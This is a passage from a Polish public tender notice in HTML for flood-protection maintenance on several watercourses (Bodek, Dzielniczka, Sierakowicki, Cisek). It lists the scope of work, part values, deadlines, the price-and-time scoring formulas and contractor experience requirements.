przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 3 - Odcinkowe prace utrzymaniowe koryta cieku Bodek z naprawą umocnień brzegowych w km 1+080 -4+520 na terenie m. Racibórz<br/><br/>Prace (stawka VAT 23%) będą polegały na:<br/>•	Uzyskaniu dostępności do terenu robót – koszt zajęć czasowych terenów obcych na potrzeby realizacji zadania;<br/>•	Ręcznym wykoszeniu porostów ze skarp;<br/>•	Wygrabieniu wykoszonych porostów ze skarp o szerokości ponad 2,0 m;<br/>•	Hakowaniu przy zarośnięciu powierzchni lustra wody do 30%;<br/>•	Hakowaniu przy zarośnięciu powierzchni lustra wody do 60%;<br/>•	Hakowaniu przy zarośnięciu powierzchni lustra wody ponad 60%;<br/>•	Ręcznym ścinaniu gęstych krzaków i podszycia;<br/>•	Załadunku gałęzi pozyskanych z wycinki krzaków na środek transportu, przewóz na odl. do 1,5 km do miejsca przeróbki i mechaniczne rozdrobnienie;<br/>•	Usuwaniu zatorów naturalnych z koryta cieku utworzonego z gałęzi, namułów ręcznych, wiatrołomów drzew, tamujących swobodny przepływ wód korytem, segregacji pozyskanego materiału z zagospodarowaniem na miejscu – bez wywozu;<br/>•	Wykonaniu opasek podwójnych z kiszek faszynowych o śr. 20+20 cm w gruncie kat. III;<br/>•	Profilowaniu skarp brzegów;<br/>•	Ręcznym przycięciu nawisów ziemnych w dolnych partiach skarp cieku;<br/>•	Plantowaniu skarp i dna rowów – kat. gruntu III przy robotach wodno-melioracyjnych;<br/>•	Obsianiu skarp w ziemi urodzajnej.<br/><br/>Prace należy prowadzić pod nadzorem przyrodniczym. Koszty wynikające z tego tytułu Wykonawca winien wliczyć w cenę oferty w kosztach ogólnych. Dokumentację z pełnienia nadzoru przyrodniczego, Wykonawca przekaże Zleceniodawcy w dniu odbioru robót. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 141671,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-08-02 do 2024-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 4 - Odcinkowe prace utrzymaniowe cieku Dzielniczka wraz z naprawą ubezpieczeń brzegowych w km 0+000-17+750 w m. Cisek, Roszowicki Las, Dzielnica, Łany, Błażejowice gm. Cisek; m. Ponięcice, gm. Rudnik<br/><br/>Prace (stawka VAT 23%) będą polegały na:<br/>•	Mechanicznym wykoszeniu porostów ze skarp i dna;<br/>•	Ręcznym wykoszeniu porostów gęstych twardych ze skarp – dokoszenie po mechanicznym wykoszeniu;<br/>•	Ręcznym ścinaniu średniej gęstości krzaków i podszycia;<br/>•	Usunięciu mechanicznym roślinności z dna cieku – udrożnieniu koryta przy użyciu koparko-odmularki cieków o szerokości dna 1,2 m. Grubość warstwy usuwanej 20 cm;<br/>•	Odtworzeniu – udrożnieniu koryta cieku Dzielniczka na dł. 520 m przy szerokości dna 1,2 m;<br/>•	Wyrównaniu rowów i kanałów po koparkach – grubość nadmiaru gruntu do ścinania do 15 cm – kat. III;<br/>•	Rozplantowaniu spycharkami ziemi wydobytej z wykopów liniowych do 1 m3 wzdłuż 1 m wykopu – kat. gruntu I-IV;<br/>•	Wykonaniu opasek pojedynczych z kiszek faszynowych o śr. 15 cm w gruncie kat. III, analogia płotek żerdziowy o śr. 15-20 cm;<br/>•	Plantowaniu skarp i dna rowów – kat. gruntu III przy robotach wodno-melioracyjnych;<br/>•	Obsianiu skarp w ziemi urodzajnej;<br/>•	Transporcie lądowym kołków drewnianych o śr. 7-9 cm na odległość do 0,5 km (załadunek i wyładunek ręczny);<br/>•	Transporcie lądowym kiszek z faszyny o śr. 20 cm na odległość do 0,5 km (załadunek i wyładunek ręczny);<br/>•	Wykonaniu narzutu kamiennego nadwodnego (zabudowa wyrw) z kamienia ciężkiego lub średniego luzem z brzegu z wyładunkiem ręcznym przy wysokości burt do 0,61-1,50 m </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 243417,52 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-08-13 do 2024-10-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 5 - Prace utrzymaniowe cieku Sierakowickiego w km 0+000-8+790, odcinkowo, gmina Sośnicowice<br/><br/>Prace (stawka VAT 23%) będą polegały na:<br/>•	Ręcznym wykoszeniu porostów gęstych twardych ze skarp;<br/>•	Wygrabieniu wykoszonych porostów ze skarp o szer. ponad 2,0 m;<br/>•	Oczyszczeniu ubezpieczenia skarp z trylinki;<br/>•	Usunięciu z trylinki naniesionego materiału;<br/>•	Hakowaniu przy zarośnięciu powierzchni lustra wody do 30%;<br/>•	Mechanicznym hakowaniu cieku z przycięciem nawisów;<br/>•	Robotach ziemnych wykonywanych koparkami polegające na odtworzeniu przekroju poprzecznego koryta;<br/>•	Remoncie ubezpieczenia skarpy cieku;<br/>•	Wykonanie palisady z kołków o śr. 10-12 cm;<br/>•	Plantowaniu skarp;<br/>•	Obsianiu skarp w ziemi urodzajnej;<br/>•	Wywozie wydobytego materiału i roślinności korzeniącej się wydobytej z cieku w trakcie wykonywania robót utrzymaniowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 130076,85 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 6 - Prace utrzymaniowe cieku Cisek w km 0+000 – 4+400 wraz z remontem 2 szt. jazów w km 3+200 i 3+800 w celu zwiększenia zdolności retencyjnej koryta cieku, m. Landzmierz i Sukowice gm. Cisek<br/><br/>Prace (stawka VAT 23%) będą polegały na:<br/>Koryto cieku Cisek<br/>•	Mechanicznym wykoszeniu porostów ze skarp i dna;<br/>•	Ręcznym wykoszeniu porostów gęstych twardych ze skarp – dokoszenie po mechanicznym wykoszeniu;<br/>•	Usunięciu roślinności z dna cieku (hakowaniu) przy użyciu łyżki koszącej koparko-odmularki do rozliczenia przyjęto szer. cieku dna 2,0 m. Grubość warstwy usuwanej 20 cm;<br/>•	Wykopach oraz przekopach wykonywanych koparkami podsiębiernymi 0,15 m3 na odkład w gruncie kat. III;<br/>•	Wykopach rowów i kanałów po koparkach gr. nadmiaru do ścinania ponad 15 cm – kat. III;<br/>•	Plantowaniu skarp i dna wykopów wykonywanych mechanicznie w gruncie kat. I-III;<br/>•	Wykonaniu opasek pojedynczych z kiszek faszynowych o śr. 25 cm w gruncie kat. III;<br/>Jaz w km 3+200 i 3+800<br/>•	Usuwaniu grubej warstwy rdzy i całkowicie przekorodowanej powłoki konstrukcji pełnościennych przed właściwym czyszczeniem;<br/>•	Czyszczeniu konstrukcji pełnościennych do stopnia Sa 1 – stan wyjściowy powierzchni B;<br/>•	Odtłuszczaniu rozpuszczalnikami konstrukcji kratowych;<br/>•	Malowaniu farbami i emaliami ftalowymi zmontowanych, skorodowanych schodów i pomostów;<br/>•	Wykonaniu i założeniu okuć dla szandorów ponad 71 mm;<br/>•	Żelbetowym umocnieniu skarp i dna wykonywanego z lądu;<br/>•	Naprawie mechanizmów zamknięć;<br/>•	Wymianie uszczelki zasuwy;<br/>•	Czyszczeniu ręcznym pionowych, skośnych cylindrycznych powierzchni betonowych;<br/>•	Czyszczeniu ręcznym poziomych powierzchni betonowych;<br/>•	Wyrównaniu i naprawie powierzchni betonowych szpachlą cementową ASOCRET-BS2 i cementową zaprawą naprawczą ASOCRET-RN – wypełnienie ubytków gr. 10 mm, powierzchnie pionowe. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 243321,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-08-13 do 2024-10-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Wykonawca musi posiadać wymagane zdolności techniczne i/lub zawodowe zapewniające należyte wykonanie zamówienia, tj. Wykonawca musi wykazać, że wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie :<br/><br/>Dla części nr 1:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 50 000,00 zł.<br/><br/>Dla części nr 2:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 70 000,00 zł.<br/><br/>Dla części nr 3:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 60 000,00 zł.<br/><br/>Dla części nr 4:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 100 000,00 zł.<br/><br/>Dla części nr 5:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót 